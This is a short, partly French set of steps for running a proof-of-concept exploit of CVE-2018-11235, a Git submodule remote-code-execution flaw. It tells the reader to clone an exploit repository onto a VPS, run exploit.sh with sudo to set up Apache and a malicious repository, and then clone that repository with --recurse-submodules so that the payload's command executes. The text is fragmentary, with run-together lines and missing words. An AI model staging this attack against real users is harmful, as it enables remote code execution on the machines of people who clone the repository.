
exploit poc for CVE-2018-11235
ssh vers votre VPS.git clone https://github.com/Rezy-Dev/CVE-2018-11235
cd CVE-2018-11235
x) à exploit.sh puis exécutez-le :sudo chmod +x exploit.sh
sudo ./exploit.sh
Il télécharge apache2 et construit le dépôt malveillant pour nous.
http://vps-ip/malicious.git comme dépôt git.git clone --recurse-submodules http://vps-ip/malicious.git
La commande RCE du payload devrait s'exécuter.
Merci !